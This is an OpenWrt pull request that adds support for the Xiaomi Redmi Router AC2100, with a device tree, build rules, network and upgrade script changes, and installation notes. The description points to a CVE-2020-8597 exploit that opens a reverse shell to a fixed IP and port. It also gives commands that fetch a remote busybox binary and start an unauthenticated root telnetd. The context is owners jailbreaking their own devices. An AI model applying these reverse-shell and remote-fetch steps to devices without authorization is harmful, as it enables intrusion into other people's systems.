### PR TITLE
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)

### DIFF
--- a/package/boot/uboot-envtools/files/ramips
+++ b/package/boot/uboot-envtools/files/ramips
@@ -34,7 +34,8 @@ zbtlink,zbt-wg2626)
 	ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x1000" "0x10000"
 	;;
 xiaomi,mir3p|\
-xiaomi,mir3g)
+xiaomi,mir3g|\
+xiaomi,redmi-router-ac2100)
 	ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x1000" "0x20000"
 	;;
 esac

--- a/target/linux/ramips/dts/mt7621_xiaomi_redmi-router-ac2100.dts
+++ b/target/linux/ramips/dts/mt7621_xiaomi_redmi-router-ac2100.dts
@@ -1,0 +1,183 @@
+// SPDX-License-Identifier: GPL-2.0-or-later OR MIT
+/dts-v1/;
+
+#include "mt7621.dtsi"
+
+#include <dt-bindings/gpio/gpio.h>
+#include <dt-bindings/input/input.h>
+
+/ {
+	compatible = "xiaomi,redmi-router-ac2100", "mediatek,mt7621-soc";
+	model = "Xiaomi Redmi Router AC2100";
+
+	aliases {
+		led-boot = &led_status_amber;
+		led-failsafe = &led_status_amber;
+		led-running = &led_status_white;
+		led-upgrade = &led_status_white;
+		label-mac-device = &gmac0;
+	};
+
+	chosen {
+		bootargs = "console=ttyS0,115200n8";
+	};
+
+	leds {
+		compatible = "gpio-leds";
+
+		led_status_amber: status_amber {
+			label = "redmi-router-ac2100:amber:status";
+			gpios = <&gpio 6 GPIO_ACTIVE_LOW>;
+		};
+
+		led_status_white: status_white {
+			label = "redmi-router-ac2100:white:status";
+			gpios = <&gpio 8 GPIO_ACTIVE_LOW>;
+		};
+
+		wan_amber {
+			label = "redmi-router-ac2100:amber:wan";
+			gpios = <&gpio 10 GPIO_ACTIVE_LOW>;
+		};
+
+		wan_white {
+			label = "redmi-router-ac2100:white:wan";
+			gpios = <&gpio 12 GPIO_ACTIVE_LOW>;
+		};
+	};
+
+	keys {
+		compatible = "gpio-keys";
+
+		reset {
+			label = "reset";
+			gpios = <&gpio 18 GPIO_ACTIVE_LOW>;
+			linux,code = <KEY_RESTART>;
+		};
+	};
+
+};
+
+
+&nand {
+	status = "okay";
+
+	partitions {
+		compatible = "fixed-partitions";
+		#address-cells = <1>;
+		#size-cells = <1>;
+
+		partition@0 {
+			label = "Bootloader";
+			reg = <0x0 0x80000>;
+			read-only;
+		};
+
+		partition@80000 {
+			label = "Config";
+			reg = <0x80000 0x40000>;
+		};
+
+		partition@c0000 {
+			label = "Bdata";
+			reg = <0xc0000 0x40000>;
+			read-only;
+		};
+
+		factory: partition@100000 {
+			label = "factory";
+			reg = <0x100000 0x40000>;
+			read-only;
+		};
+
+		partition@140000 {
+			label = "crash";
+			reg = <0x140000 0x40000>;
+		};
+
+		partition@180000 {
+			label = "crash_syslog";
+			reg = <0x180000 0x40000>;
+		};
+
+		partition@1c0000 {
+			label = "reserved0";
+			reg = <0x1c0000 0x40000>;
+			read-only;
+		};
+
+		/* We keep stock xiaomi firmware (kernel0) here */
+		partition@200000 {
+			label = "kernel_stock";
+			reg = <0x200000 0x400000>;
+		};
+
+		partition@600000 {
+			label = "kernel";
+			reg = <0x600000 0x400000>;
+		};
+
+		partition@a00000 {
+			label = "ubi";
+			reg = <0xa00000 0x7580000>;
+		};
+	};
+};
+
+&pcie {
+	status = "okay";
+};
+
+&pcie0 {
+	wifi@0,0 {
+		compatible = "mediatek,mt76";
+		reg = <0x0000 0 0 0 0>;
+		mediatek,mtd-eeprom = <&factory 0x8000>;
+		ieee80211-freq-limit = <5000000 6000000>;
+	};
+};
+
+&pcie1 {
+	wifi@0,0 {
+		compatible = "mediatek,mt76";
+		reg = <0x0000 0 0 0 0>;
+		mediatek,mtd-eeprom = <&factory 0x0000>;
+		ieee80211-freq-limit = <2400000 2500000>;
+	};
+};
+
+&gmac0 {
+	mtd-mac-address = <&factory 0xe000>;
+};
+
+&switch0 {
+	ports {
+		port@0 {
+			status = "okay";
+			label = "wan";
+			mtd-mac-address = <&factory 0xe006>;
+		};
+
+		port@2 {
+			status = "okay";
+			label = "lan1";
+		};
+
+		port@3 {
+			status = "okay";
+			label = "lan2";
+		};
+
+		port@4 {
+			status = "okay";
+			label = "lan3";
+		};
+	};
+};
+
+&state_default {
+	gpio {
+		groups = "uart2", "uart3", "wdt";
+		function = "gpio";
+	};
+};

--- a/target/linux/ramips/image/mt7621.mk
+++ b/target/linux/ramips/image/mt7621.mk
@@ -927,6 +927,23 @@ define Device/xiaomi_mir3p
 endef
 TARGET_DEVICES += xiaomi_mir3p
 
+define Device/xiaomi_redmi-router-ac2100
+  $(Device/uimage-lzma-loader)
+  BLOCKSIZE := 128k
+  PAGESIZE := 2048
+  KERNEL_SIZE := 4096k
+  IMAGE_SIZE := 124416k
+  UBINIZE_OPTS := -E 5
+  IMAGES += kernel1.bin rootfs0.bin
+  IMAGE/kernel1.bin := append-kernel
+  IMAGE/rootfs0.bin := append-ubi | check-size
+  IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
+  DEVICE_VENDOR := Xiaomi
+  DEVICE_MODEL := Redmi Router AC2100
+  DEVICE_PACKAGES := kmod-mt7603 kmod-mt7615e wpad-basic uboot-envtools
+endef
+TARGET_DEVICES += xiaomi_redmi-router-ac2100
+
 define Device/xiaoyu_xy-c5
   IMAGE_SIZE := 32448k
   DEVICE_VENDOR := XiaoYu

--- a/target/linux/ramips/mt7621/base-files/etc/board.d/01_leds
+++ b/target/linux/ramips/mt7621/base-files/etc/board.d/01_leds
@@ -70,6 +70,9 @@ tplink,re650-v1)
 xzwifi,creativebox-v1)
 	ucidef_set_led_netdev "internet" "internet" "$boardname:blue:internet" "wan"
 	;;
+xiaomi,redmi-router-ac2100)
+	ucidef_set_led_netdev "wan" "wan" "$boardname:white:wan" "wan"
+	;;
 youhua,wr1200js)
 	ucidef_set_led_netdev "internet" "INTERNET" "$boardname:green:wan" "wan"
 	;;

--- a/target/linux/ramips/mt7621/base-files/etc/board.d/02_network
+++ b/target/linux/ramips/mt7621/base-files/etc/board.d/02_network
@@ -21,7 +21,8 @@ ramips_setup_interfaces()
 		;;
 	gehua,ghl-r-001|\
 	hiwifi,hc5962|\
-	xiaomi,mir3p)
+	xiaomi,mir3p|\
+	xiaomi,redmi-router-ac2100)
 		ucidef_set_interfaces_lan_wan "lan1 lan2 lan3" "wan"
 		;;
 	gnubee,gb-pc1|\

--- a/target/linux/ramips/mt7621/base-files/lib/upgrade/platform.sh
+++ b/target/linux/ramips/mt7621/base-files/lib/upgrade/platform.sh
@@ -53,7 +53,8 @@ platform_do_upgrade() {
 	netgear,r6850|\
 	netis,wf2881|\
 	xiaomi,mir3g|\
-	xiaomi,mir3p)
+	xiaomi,mir3p|\
+	xiaomi,redmi-router-ac2100)
 		nand_do_upgrade "$1"
 		;;
 	iodata,wn-ax1167gr2|\


### PR DESCRIPTION
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot

Installation:

1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0

Restore to stock:

1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white

Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.

Exploit and detailed instructions:

https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100

An implementation of CVE-2020-8597 against stock firmware version 1.0.14

This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.

As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.

The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh

Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>

Thanks for your contribution to OpenWrt!

To help keep the codebase consistent and readable,
and to help people review your contribution,
we ask you to follow the rules you find in the wiki at this link
https://openwrt.org/submitting-patches

Please remove this message before posting the pull request.
